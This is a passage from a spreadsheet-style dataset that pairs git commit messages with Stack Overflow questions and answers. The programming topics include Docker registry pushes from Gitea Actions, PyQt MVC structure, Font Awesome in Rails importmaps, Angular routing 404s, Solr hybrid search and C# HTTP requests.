&lt;pre&gt;&lt;code&gt;name: Docker Build and Push run-name: ${{ gitea.actor }} made changes so running Gitea actions ðŸš€ on: [push]
jobs: build-and-push: runs-on: ubuntu-latest
steps:
  - name: Checkout code
    uses: actions/checkout@v3
  - name: Force Buildx to Use HTTP
    run: |
      export BUILDKIT_INLINE_CACHE=1
      export DOCKER_BUILDKIT=0
      export REGISTRY_INSECURE=1
      export BUILDKIT_NO_CLIENT_TOKEN=true
  - name: Set up Docker Buildx
    uses: docker/setup-buildx-action@v3
    with:
      driver-opts: image=moby/buildkit:latest
      buildkitd-flags: &amp;quot;--allow-insecure-entitlement security.insecure --allow-insecure-entitlement network.host --config /data/registries.toml&amp;quot;
      install: true
      network: host
  - name: Build and push
    uses: docker/build-push-action@v6
    with:
      context: .
      file: ./Dockerfile
      push: true
      tags: 192.168.50.149:5000/chartsnap:latest
      allow:
        security.insecure
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am getting the error:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;#14 exporting to image&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3537#14 exporting layers&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3538#14 exporting layers 16.3s done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3539#14 exporting manifest sha256:8948fc8542b65700a3714d82b5091eb2e9337a4de14b46719799845b4a6eaf91 done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3540#14 exporting config sha256:a23c9fa7b2a6227d503ffcdb62ec509204ca77da5bc0847dea191ba345ecc043 done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3541#14 exporting attestation manifest sha256:403a0f1a5d60467531884c03625a47beab332973b86af9a6faa3909f4e98fb1b done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3542#14 exporting manifest list sha256:c5d5989d0102c3baa0076a35ae18383230c812f72e4e79f2408c9e3f827f89a8 done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3543#14 pushing layers done&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3544#14 ERROR: failed to push &amp;lt;ip&amp;gt;:5000/chartsnap:latest: failed to do request: Head &amp;quot;https://&amp;lt;ip&amp;gt;:5000/v2/chartsnap/blobs/sha256:cf688aafa57c989d0a7d9d1b11eb344d09a44b6bdeaf726af74a625841ce26e3&amp;quot;: http: server gave HTTP response to HTTPS client&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3545------&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;3546 &amp;gt; exporting to image:&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I have the docker registry running at &amp;lt;ip&amp;gt;:5000 which I verified using the curl &amp;lt;ip:&amp;gt;:5000/v2/_catalog and trying a manual push. PS it is not authenticated a push from my dev machine onto the registry works. Any guidance is appreciated.&lt;/p&gt;
&lt;p&gt;I tried google searching and found posts around setting more command line params which failed. Tried setting the toml file with insecure registries that failed as well. Last of all gpt also tried and failed.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C930</t>
  </si>
  <si>
    <t>Refractor to include pattern
MVC:
https://stackoverflow.com/questions/26698628/mvc-design-with-qt-designer-and-pyqt-pyside
https://stackoverflow.com/questions/63113441/pyqt5-signals-and-slots-in-mvc-model-not-working</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Firstly, just be aware that Qt already uses the concept of views and models but that's not actually what you're after. In short the Qt MCV concept is a way to automatically link a widget (e.g. a QListView) to a data source (e.g. a QStringListModel) so that changes to the data in the model automagically appear in the widget and vice versa. This is a (very) useful feature but it's a different thing to an application scale MVC design pattern. The two concepts can be used together of course and that does offer some obvious shortcuts. Application scale MVC design however must be manually programmed.&lt;/p&gt;
&lt;p&gt;Here's an example MVC application that has a single view, controller, and model. The view has 3 widgets that each independently listen for and react to changes to data in the model. The spin box and button can both manipulate data in the model via the controller.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/CSYaY.png" rel="noreferrer"&gt;&lt;img src="https://i.sstatic.net/CSYaY.png" alt="mvc_app" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The file structure is arranged like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;project/
    mvc_app.py              # main application with App class
    mvc_app_rc.py           # auto-generated resources file (using pyrcc.exe or equivalent)
    controllers/
        main_ctrl.py        # main controller with MainController class
        other_ctrl.py
    model/
        model.py            # model with Model class
    resources/
        mvc_app.qrc         # Qt resources file
        main_view.ui        # Qt designer files
        other_view.ui
        img/
            icon.png
    views/
        main_view.py        # main view with MainView class
        main_view_ui.py     # auto-generated ui file (using pyuic.exe or equivalent)
        other_view.py
        other_view_ui.py
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Application&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;mvc_app.py&lt;/code&gt; would be responsible for instantiating each of the view, controllers, and model(s) and passing references between them. This can be quite minimal:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import sys
from PyQt5.QtWidgets import QApplication
from model.model import Model
from controllers.main_ctrl import MainController
from views.main_view import MainView
class App(QApplication):
    def __init__(self, sys_argv):
        super(App, self).__init__(sys_argv)
        self.model = Model()
        self.main_controller = MainController(self.model)
        self.main_view = MainView(self.model, self.main_controller)
        self.main_view.show()
if __name__ == '__main__':
    app = App(sys.argv)
    sys.exit(app.exec_())
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Views&lt;/h3&gt;
&lt;p&gt;Use Qt designer to create the .ui layout files to the extent that you assign variables names to widgets and adjust their basic properties. Don't bother adding signals or slots as it's generally easier just to connect them to functions from within the view class.&lt;/p&gt;
&lt;p&gt;The .ui layout files are converted to .py layout files when processed with pyuic or pyside-uic. The .py view files can then import the relevant auto-generated classes from the .py layout files.&lt;/p&gt;
&lt;p&gt;The view class(es) should contain the minimal code required to connect to the signals coming from the widgets in your layout. View events can call and pass basic information to a method in the view class and onto a method in a controller class, where any logic should be. It would look something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from PyQt5.QtWidgets import QMainWindow
from PyQt5.QtCore import pyqtSlot
from views.main_view_ui import Ui_MainWindow
class MainView(QMainWindow):
    def __init__(self, model, main_controller):
        super().__init__()
        self._model = model
        self._main_controller = main_controller
        self._ui = Ui_MainWindow()
        self._ui.setupUi(self)
        # connect widgets to controller
        self._ui.spinBox_amount.valueChanged.connect(self._main_controller.change_amount)
        self._ui.pushButton_reset.clicked.connect(lambda: self._main_controller.change_amount(0))
        # listen for model event signals
        self._model.amount_changed.connect(self.on_amount_changed)
        self._model.even_odd_changed.connect(self.on_even_odd_changed)
        self._model.enable_reset_changed.connect(self.on_enable_reset_changed)
        # set a default value
        self._main_controller.change_amount(42)
    @pyqtSlot(int)
    def on_amount_changed(self, value):
        self._ui.spinBox_amount.setValue(value)
    @pyqtSlot(str)
    def on_even_odd_changed(self, value):
        self._ui.label_even_odd.setText(value)
    @pyqtSlot(bool)
    def on_enable_reset_changed(self, value):
        self._ui.pushButton_reset.setEnabled(value)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The view doesn't do much apart from link widget events to the relevant controller function, and listen for changes in the model, which are emitted as Qt signals.&lt;/p&gt;
&lt;h3&gt;Controllers&lt;/h3&gt;
&lt;p&gt;The controller class(es) perform any logic and then sets data in the model. An example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from PyQt5.QtCore import QObject, pyqtSlot
class MainController(QObject):
    def __init__(self, model):
        super().__init__()
        self._model = model
    @pyqtSlot(int)
    def change_amount(self, value):
        self._model.amount = value
        # calculate even or odd
        self._model.even_odd = 'odd' if value % 2 else 'even'
        # calculate button enabled state
        self._model.enable_reset = True if value else False
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;change_amount&lt;/code&gt; function takes the new value from the widget, performs logic, and sets attributes on the model.&lt;/p&gt;
&lt;h3&gt;Model&lt;/h3&gt;
&lt;p&gt;The model class stores program data and state and some minimal logic for announcing changes to this data. This model shouldn't be confused with the Qt model (&lt;a href="http://qt-project.org/doc/qt-4.8/model-view-programming.html" rel="noreferrer"&gt;see http://qt-project.org/doc/qt-4.8/model-view-programming.html&lt;/a&gt;) as it's not really the same thing.&lt;/p&gt;
&lt;p&gt;The model might look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from PyQt5.QtCore import QObject, pyqtSignal
class Model(QObject):
    amount_changed = pyqtSignal(int)
    even_odd_changed = pyqtSignal(str)
    enable_reset_changed = pyqtSignal(bool)
    @property
    def amount(self):
        return self._amount
    @amount.setter
    def amount(self, value):
        self._amount = value
        self.amount_changed.emit(value)
    @property
    def even_odd(self):
        return self._even_odd
    @even_odd.setter
    def even_odd(self, value):
        self._even_odd = value
        self.even_odd_changed.emit(value)
    @property
    def enable_reset(self):
        return self._enable_reset
    @enable_reset.setter
    def enable_reset(self, value):
        self._enable_reset = value
        self.enable_reset_changed.emit(value)
    def __init__(self):
        super().__init__()
        self._amount = 0
        self._even_odd = ''
        self._enable_reset = False
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Writes to the model automatically emit signals to any listening views via code in the &lt;code&gt;setter&lt;/code&gt; decorated functions. Alternatively the controller could manually trigger the signal whenever it decides.&lt;/p&gt;
&lt;p&gt;In the case where Qt model types (e.g. QStringListModel) have been connected with a widget then the view containing that widget does not need to be updated at all; this happens automatically via the Qt framework.&lt;/p&gt;
&lt;h3&gt;UI source file&lt;/h3&gt;
&lt;p&gt;For completion, the example &lt;code&gt;main_view.ui&lt;/code&gt; file is included here:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;
&amp;lt;ui version=&amp;quot;4.0&amp;quot;&amp;gt;
 &amp;lt;class&amp;gt;MainWindow&amp;lt;/class&amp;gt;
 &amp;lt;widget class=&amp;quot;QMainWindow&amp;quot; name=&amp;quot;MainWindow&amp;quot;&amp;gt;
  &amp;lt;property name=&amp;quot;geometry&amp;quot;&amp;gt;
   &amp;lt;rect&amp;gt;
    &amp;lt;x&amp;gt;0&amp;lt;/x&amp;gt;
    &amp;lt;y&amp;gt;0&amp;lt;/y&amp;gt;
    &amp;lt;width&amp;gt;93&amp;lt;/width&amp;gt;
    &amp;lt;height&amp;gt;86&amp;lt;/height&amp;gt;
   &amp;lt;/rect&amp;gt;
  &amp;lt;/property&amp;gt;
  &amp;lt;widget class=&amp;quot;QWidget&amp;quot; name=&amp;quot;centralwidget&amp;quot;&amp;gt;
   &amp;lt;layout class=&amp;quot;QVBoxLayout&amp;quot;&amp;gt;
    &amp;lt;item&amp;gt;
     &amp;lt;widget class=&amp;quot;QSpinBox&amp;quot; name=&amp;quot;spinBox_amount&amp;quot;/&amp;gt;
    &amp;lt;/item&amp;gt;
    &amp;lt;item&amp;gt;
     &amp;lt;widget class=&amp;quot;QLabel&amp;quot; name=&amp;quot;label_even_odd&amp;quot;/&amp;gt;
    &amp;lt;/item&amp;gt;
    &amp;lt;item&amp;gt;
     &amp;lt;widget class=&amp;quot;QPushButton&amp;quot; name=&amp;quot;pushButton_reset&amp;quot;&amp;gt;
      &amp;lt;property name=&amp;quot;enabled&amp;quot;&amp;gt;
       &amp;lt;bool&amp;gt;false&amp;lt;/bool&amp;gt;
      &amp;lt;/property&amp;gt;
     &amp;lt;/widget&amp;gt;
    &amp;lt;/item&amp;gt;
   &amp;lt;/layout&amp;gt;
  &amp;lt;/widget&amp;gt;
 &amp;lt;/widget&amp;gt;
 &amp;lt;resources/&amp;gt;
 &amp;lt;connections/&amp;gt;
&amp;lt;/ui&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;It is converted to &lt;code&gt;main_view_ui.py&lt;/code&gt; by calling:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pyuic5 main_view.ui -o ..\views\main_view_ui.py
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The resource file &lt;code&gt;mvc_app.qrc&lt;/code&gt; is converted to &lt;code&gt;mvc_app_rc.py&lt;/code&gt; by calling:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pyrcc5 mvc_app.qrc -o ..\mvc_app_rc.py
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Interesting links&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://stackoverflow.com/questions/5543198/why-qt-is-misusing-model-view-terminology"&gt;Why Qt is misusing model/view terminology?&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">We are in the process of rewriting a large legacy system that makes extensive (mis)use of a workflow engine. Going forward, I'd like to consider alternatives to a workflow engine for the new application. One very interesting possibility is a [external-link] + Rules Engine. What other paradigms exist?
I'll mention that this application orchestrates complex document publishing workflows with many different tweaks depending on country/region/etc, but I'd like to keep the answers more general if possible.
Edit: I added a bounty to this question to get more feedback. I would like to hear from somebody who has actually implemented a workflow alternative. If nothing is produced, I will accept the BPEL answer, though I'm completely unenthusiatic about the technology itself.
</t>
  </si>
  <si>
    <t>C931</t>
  </si>
  <si>
    <t>fixes for .NET Core &gt; 3.0
 'Microsoft.AspNetCore.Mvc.NewtonsoftJson' necessary because of https://stackoverflow.com/a/58155409 (change &gt; 3.0)
 properties must be public because of https://stackoverflow.com/a/44318409 (change &gt; 3.0)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Not sure this help but I think they made some change in .net core 3.0 Newtonsoft.JSON package so you can try this&lt;/p&gt;
&lt;p&gt;Install &lt;code&gt;Microsoft.AspNetCore.Mvc.NewtonsoftJson&lt;/code&gt; package.&lt;/p&gt;
&lt;p&gt;In your startup.cs add &lt;/p&gt;
&lt;p&gt;&lt;code&gt;services.AddControllers().AddNewtonsoftJson();&lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm quite a beginner with VBA and have a question regarding &lt;code&gt;href&lt;/code&gt;-tags.&lt;/p&gt;
&lt;p&gt;In following example I have the &lt;code&gt;href&lt;/code&gt;-tag to identify my requested value, which is inside in the &lt;code&gt;b&lt;/code&gt;-tag, in this case the 585.00. That's the value I need.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div style=&amp;quot;float: left; width: 72px; text-align: right; height: 15px; padding: 2px; background-image: url(/img/rowbgnd.png)&amp;quot;&amp;gt;
&amp;lt;a href=&amp;quot;/goldvreneli-20-franken-vreneli/de/44-1/add/CH-GV-20-1897.2-2/1&amp;quot; title=&amp;quot;in den Warenkorb legen&amp;quot;&amp;gt;
&amp;lt;b&amp;gt;585.00&amp;lt;/b&amp;gt;
&amp;lt;/a&amp;gt;
&amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I didn't find any solution. Can anyone help me?&lt;/p&gt;
&lt;p&gt;To get a value from a website I found this article &lt;a href="https://stackoverflow.com/questions/23594067/trying-to-extract-one-value-from-a-webpage-with-vba-in-excel"&gt;Trying to extract ONE value from a webpage with VBA in Excel&lt;/a&gt; and it worked fine for another case. But in the example above I don't have a class for which I could use this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IE.Document.getElementsByClassName(&amp;quot;className&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I found some good Entries (e.g. &lt;a href="https://stackoverflow.com/questions/61186373/vba-return-html-element-href-from-class-table"&gt;VBA return html element href from class table&lt;/a&gt;) to get the value of the &lt;code&gt;href&lt;/code&gt; itself, but nowhere, how to get the tag below.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C932</t>
  </si>
  <si>
    <t>Add FontAwesome via importmaps as per https://stackoverflow.com/questions/71430573/can-font-awesome-be-used-with-importmaps-in-rails-7 - override BL standard search bar component for something full width and way simpler (for now) - modify css for flatly like variables and values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote a &lt;a href="https://pablofernandez.tech/2022/03/12/using-font-awesome-6-in-a-rails-7-project-that-uses-importmaps/" rel="noreferrer"&gt;longer piece about this on my blog&lt;/a&gt;, but the gist is copied here.&lt;/p&gt;
&lt;p&gt;I just made it work but I'm not entirely sure why it works so I would appreciate any insight or improvements on this solution. In the meantime, I'm happy to share with the world:&lt;/p&gt;
&lt;p&gt;First, you need to pin the Font Awesome Javascript packages by running:&lt;/p&gt;
&lt;pre class="lang-sh prettyprint-override"&gt;&lt;code&gt;./bin/importmap pin @fortawesome/fontawesome-free @fortawesome/fontawesome-svg-core @fortawesome/free-brands-svg-icons @fortawesome/free-regular-svg-icons @fortawesome/free-solid-svg-icons
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which adds:&lt;/p&gt;
&lt;pre class="lang-rb prettyprint-override"&gt;&lt;code&gt;pin &amp;quot;@fortawesome/fontawesome-free&amp;quot;, to: &amp;quot;https://ga.jspm.io/npm:@fortawesome/fontawesome-free@6.0.0/js/fontawesome.js&amp;quot;
pin &amp;quot;@fortawesome/fontawesome-svg-core&amp;quot;, to: &amp;quot;https://ga.jspm.io/npm:@fortawesome/fontawesome-svg-core@1.3.0/index.es.js&amp;quot;
pin &amp;quot;@fortawesome/free-brands-svg-icons&amp;quot;, to: &amp;quot;https://ga.jspm.io/npm:@fortawesome/free-brands-svg-icons@6.0.0/index.es.js&amp;quot;
pin &amp;quot;@fortawesome/free-regular-svg-icons&amp;quot;, to: &amp;quot;https://ga.jspm.io/npm:@fortawesome/free-regular-svg-icons@6.0.0/index.es.js&amp;quot;
pin &amp;quot;@fortawesome/free-solid-svg-icons&amp;quot;, to: &amp;quot;https://ga.jspm.io/npm:@fortawesome/free-solid-svg-icons@6.0.0/index.es.js&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to your &lt;code&gt;importmap.rb&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Then in your &lt;code&gt;app/javascript/application.js&lt;/code&gt; you need to add:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import {far} from &amp;quot;@fortawesome/free-regular-svg-icons&amp;quot;
import {fas} from &amp;quot;@fortawesome/free-solid-svg-icons&amp;quot;
import {fab} from &amp;quot;@fortawesome/free-brands-svg-icons&amp;quot;
import {library} from &amp;quot;@fortawesome/fontawesome-svg-core&amp;quot;
import &amp;quot;@fortawesome/fontawesome-free&amp;quot;
library.add(far, fas, fab)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you don't need one of the libraries you can skip them, but skipping the last two imports or adding each icon package to the library makes it not work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">I've been really impressed by the growing number of software platforms that let outside developers contribute code through a pluggable architecture (plugins/extensions).
I've been studying which platforms have the best plugin communities...
Excellent Plugin Architectures with thriving plugin communities:
WordPress (and WordPress MultiUser) for blogging: [external-link]
bbPress for message boards: [external-link]
Firefox for browsers: [external-link]
Magento for e-commerce: [external-link]
Then there are platforms with less active plugin communities:
MediaWiki for wikis: [external-link]
(For the sake of focus, let's put aside or ignore platforms that enable full-fledged software apps, like Microsoft Windows, iPhone, and Facebook.)
What would you say gives a software platform a successful plugin architecture with lots of plugins, versus another platform with a smaller or inactive developer community?
Just to get things started, here's a partial list:
The platform does something broadly useful: let's people browse the web, buy and sell stuff, publish blogs and message boards, etc.
The platform is open source (or at a minimum, the source code is freely available).
All important functions in the platform are fully plugabble through hooks and filters.
All or most pluggable functions are well documented (or there's a wiki so developers can document it for you).
There's a forum or email list where developers can share plugins, and share tips and tricks
There's a forum or email list where less sophisticated users can get help installing and configuring the plugins.
What kind of things can a platform developer do to create a pluggable architecture that encourages lots of outside developers to create plugins?
</t>
  </si>
  <si>
    <t>C933</t>
  </si>
  <si>
    <t>STILL AN ISSUE: 404 error on reload
- finding out that consolidating components may still be on the table
- REF: old but possibly still relevant(?):
  - https://stackoverflow.com/questions/35284988/angular-2-404-error-occur-when-i-refresh-through-the-browser
  - https://stackoverflow.com/questions/56631700/website-is-not-loading-on-server-while-refresh-it-from-browser-in-angular-2
- REF: more recent:
  - https://stackoverflow.com/questions/59552387/how-to-reload-a-page-in-angular-8-the-proper-way
- HOME component: re-instated as proper homepage vs a redirect to WOMEN (copied from WOMEN)
- MASONRY component: DELETED
- PARSE-CSV: DELETED</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In fact, it's normal that you have a 404 error when refreshing your application since the actual address within the browser is updating (and without # / hashbang approach). By default, HTML5 history is used for reusing in Angular2.&lt;/p&gt;
&lt;p&gt;To fix the 404 error, you need to update your server to serve the &lt;code&gt;index.html&lt;/code&gt; file for each route path you defined.&lt;/p&gt;
&lt;p&gt;If you want to switch to the HashBang approach, you need to use this configuration:&lt;/p&gt;
&lt;pre class="lang-js prettyprint-override"&gt;&lt;code&gt;import {bootstrap} from 'angular2/platform/browser';
import {provide} from 'angular2/core';
import {ROUTER_PROVIDERS} from 'angular2/router';
import {LocationStrategy, HashLocationStrategy} from '@angular/common';
import {MyApp} from './myapp';
bootstrap(MyApp, [
  ROUTER_PROVIDERS,
  {provide: LocationStrategy, useClass: HashLocationStrategy}
]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In this case, when you refresh the page, it will be displayed again (but you will have a &lt;code&gt;#&lt;/code&gt; in your address).&lt;/p&gt;
&lt;p&gt;This link could help you as well: &lt;a href="https://stackoverflow.com/questions/34415725/when-i-refresh-my-website-i-get-a-404-this-is-with-angular2-and-firebase/"&gt;When I refresh my website I get a 404. This is with Angular2 and firebase&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Hope it helps you,
Thierry&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was able to implement a hybrid search engine on &lt;strong&gt;Apache Solr 9.6.1&lt;/strong&gt; that combines lexical search (edismax) and vector search (KNN-based embeddings) within a single request. The idea is simple:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Lexical Search retrieves results based on text relevance.&lt;/li&gt;
&lt;li&gt;Vector Search retrieves results based on semantic similarity.&lt;/li&gt;
&lt;li&gt;Hybrid Scoring sums both scores, where a missing score (if a
document appears in only one search) should be treated as zero.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This approach is working, but I am unable to properly return individual score components of lexical search (score1) vs. vector search (score2 from cosine similarity). Right now, Solr only returns the final combined score, but there is no clear way to see how much of that score comes from lexical search vs. vector search. The following is a code snippet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def hybrid_search(query, top_k=10):
embedding = np.array(embed([query]), dtype=np.float32
embedding = list(embedding[0])
lxq= rf&amp;quot;&amp;quot;&amp;quot;{{!type=edismax 
            qf='text'
            q.op=OR
            tie=0.1
            bq=''
            bf=''
            boost=''
        }}({query})&amp;quot;&amp;quot;&amp;quot;
solr_query = {&amp;quot;params&amp;quot;: {
    &amp;quot;q&amp;quot;: &amp;quot;{!bool filter=$retrievalStage must=$rankingStage}&amp;quot;,
    &amp;quot;rankingStage&amp;quot;: &amp;quot;{!func}sum(query($normalisedLexicalQuery),query($vectorQuery))&amp;quot;,
    &amp;quot;retrievalStage&amp;quot;:&amp;quot;{!bool should=$lexicalQuery should=$vectorQuery}&amp;quot;, # Union
    &amp;quot;normalisedLexicalQuery&amp;quot;: &amp;quot;{!func}scale(query($lexicalQuery),0,1)&amp;quot;,
    &amp;quot;lexicalQuery&amp;quot;: lxq,
    &amp;quot;vectorQuery&amp;quot;: f&amp;quot;{{!knn f=all_v512 topK={top_k}}}{embedding}&amp;quot;,
    &amp;quot;fl&amp;quot;: &amp;quot;text, score&amp;quot;,
    &amp;quot;rows&amp;quot;: top_k,
    &amp;quot;fq&amp;quot;: [&amp;quot;&amp;quot;],
    &amp;quot;rq&amp;quot;: &amp;quot;{!rerank reRankQuery=$rqq reRankDocs=100 reRankWeight=3}&amp;quot;,
    &amp;quot;rqq&amp;quot;: &amp;quot;{!frange l=$cutoff}query($rankingStage)&amp;quot;,
    &amp;quot;sort&amp;quot;: &amp;quot;score desc&amp;quot;,
}}
response = requests.post(SOLR_URL, headers=HEADERS, json=solr_query)
response = response.json()
return response
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Before the retrieval stage, I scale the scores of the keyword search to be between 0 and 1 to make them similar to the scores of the vector search, since the scores in the keyword search are unbounded.
After that, I take the union between both retrievals, where the scores get added.
For example, if post x was retrieved in both the keyword search and the vector search, with scores 0.6 and 0.5 respitevly, the final score would be 0.6 + 0.5 = 1.1.
If a post was retrieved in one but not the other, it would get simply added by 0.
Now the question is how can I retrieve both scores separately (not the final score) when using hybrid search, and without having to send two different requests to Solr, as in the hybrid approach, I only send one request for both retrievals.&lt;/p&gt;
&lt;p&gt;I have tried to include &amp;quot;score&amp;quot; in the &amp;quot;fl&amp;quot; field, but it only shows the final score (I assume).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C934</t>
  </si>
  <si>
    <t>fix(react-native): use View as a container for react-native (algolia/
react-instantsearch#1729)
fixes algolia/react-instantsearch#1730 
Also fixes:
- http://stackoverflow.com/questions/41064940/using-algolia-react-instantsearch-with-react-native
- http://stackoverflow.com/questions/41066380/react-native-algolia-instantsearch-expected-a-component-class-got-object-objec</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;this is now solved in 2.0.1: &lt;a href="https://github.com/algolia/instantsearch.js/blob/e15d37362fcd1eb60b5476307160062321983f09/CHANGELOG.md#201-2016-12-15" rel="nofollow noreferrer"&gt;https://github.com/algolia/instantsearch.js/blob/e15d37362fcd1eb60b5476307160062321983f09/CHANGELOG.md#201-2016-12-15&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">In the past I've used Doxygen for C and C++, but now I've been thrown on Fortran project and I would like to get a quick all encompassing look at the architecture.
In the past I've found reverse engineering tools to be useful where no documentation of the architecture exists. 
So, is there a tool out there that will reverse engineer Fortran code? 
I tried to use Doxygen, but didn't have any luck.   I will be working with two different projects - one Fortran 90 and I think is in Fortran 77.  
Thanks for any insights and feedback. 
</t>
  </si>
  <si>
    <t>C935</t>
  </si>
  <si>
    <t>Added sample react component
🎨 Added sample react component
🐛 Fix bug with webpack bunding, thanks to trousyt on stackoverflow
(http://stackoverflow.com/questions/37443432/webpack-throws-syntax-error-for-jsx)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The loaders property must exist within the module property. &lt;a href="https://webpack.github.io/docs/loaders.html" rel="nofollow noreferrer"&gt;Webpack Loaders&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;module.exports = {
  // ...
  // Output to /build
  output: {
    path: path.join(__dirname, "build", "js"),
    filename: "bundle.js"
  },
  module: {
    loaders: [
      { test: /\.jsx$/, exclude: /node_modules/, loader: "babel-loader" }
    ]
  },
  //...
};
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to ping this url for live events &lt;code&gt;https://www.imf.org/en/live&lt;/code&gt; with this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using var httpClientHandler = new HttpClientHandler() { MaxAutomaticRedirections = 10, AllowAutoRedirect = true};
using var httpClient = new HttpClient(httpClientHandler);
var httpRequest = new HttpRequestMessage(HttpMethod.Get, &amp;quot;https://www.imf.org/en/live&amp;quot;);    
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;authority&amp;quot;, &amp;quot;www.imf.org&amp;quot;);
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;method&amp;quot;, &amp;quot;GET&amp;quot;);    
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;scheme&amp;quot;, &amp;quot;https&amp;quot;);
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;accept&amp;quot;, &amp;quot;text/html&amp;quot;);
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;accept-encoding&amp;quot;, &amp;quot;gzip&amp;quot;);
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;accept-language&amp;quot;, &amp;quot;en-US,en;q=0.9&amp;quot;);
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;cache-control&amp;quot;, &amp;quot;no-cache&amp;quot;);
httpRequest.Headers.TryAddWithoutValidation(&amp;quot;pragma&amp;quot;, &amp;quot;no-cache&amp;quot;);
var response = await httpClient.SendAsync(httpRequest);
response.EnsureSuccessStatusCode();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In a &lt;code&gt;.net9&lt;/code&gt; Console application but it gets stuck or yields and error&lt;/p&gt;
&lt;p&gt;&lt;code&gt;{&amp;quot;Unable to read data from the transport connection: An existing connection was forcibly closed by the remote host..&amp;quot;}&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;If I try the same &lt;code&gt;httprequest&lt;/code&gt; from powershell, it works fine and returns some content&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Invoke-WebRequest -UseBasicParsing -Uri &amp;quot;https://www.imf.org/en/live&amp;quot; `
-Headers @{  
  &amp;quot;authority&amp;quot;=&amp;quot;www.imf.org&amp;quot;
  &amp;quot;method&amp;quot;=&amp;quot;GET&amp;quot; 
  &amp;quot;scheme&amp;quot;=&amp;quot;https&amp;quot;
  &amp;quot;accept&amp;quot;=&amp;quot;text/html&amp;quot;
  &amp;quot;accept-encoding&amp;quot;=&amp;quot;gzip&amp;quot;
  &amp;quot;accept-language&amp;quot;=&amp;quot;en-US,en;q=0.9&amp;quot;
